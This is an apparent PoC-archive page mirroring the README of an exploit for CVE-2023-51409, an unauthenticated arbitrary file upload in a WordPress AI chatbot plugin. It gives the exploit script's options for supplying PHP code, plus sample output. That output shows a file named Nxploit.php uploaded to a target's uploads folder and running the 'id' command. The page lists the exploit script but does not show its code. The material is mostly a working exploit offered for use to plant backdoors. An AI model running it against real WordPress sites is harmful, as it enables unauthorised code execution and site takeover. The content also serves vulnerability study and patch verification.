关联漏洞
介绍
# CVE-2023-51409
#### AI Engine: ChatGPT Chatbot <= 1.9.98 - Unauthenticated Arbitrary File Upload via rest_upload
## Description
This could allow a malicious actor to upload any type of file to your website. This can include backdoors which are then executed to gain further access to your website.
## usage:
```
options:
-h, --help show this help message and exit
-u URL, --url URL Base URL of the WordPress instance.
-code PHP_CODE, --php_code PHP_CODE
PHP code to upload (default, id).
```
### The result
```
[INFO] Initiating version check for target.
[INFO] Target plugin version detected: 1.9.98
[VULNERABLE] Detected vulnerable plugin version. Proceeding with exploitation.
[INFO] Target is vulnerable. Proceeding with file upload.
[INFO] Attempting to upload file: Nxploit.php to endpoint: http://192.168.100.74:888/wordpress/wp-json/mwai-ui/v1/files/upload
[SUCCESS] File uploaded successfully! Accessible at: http://192.168.100.74:888/wordpress/wp-content/uploads/2025/01/Nxploit.php
[INFO] Exploitation complete. Uploaded file URL: http://192.168.100.74:888/wordpress/wp-content/uploads/2025/01/Nxploit.php
```
### default php code
```
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
```
文件快照
[4.0K] /data/pocs/2f0441ba4923982c443df04f4c9052549c2872ba
├── [5.0K] CVE-2023-51409.py
└── [1.2K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。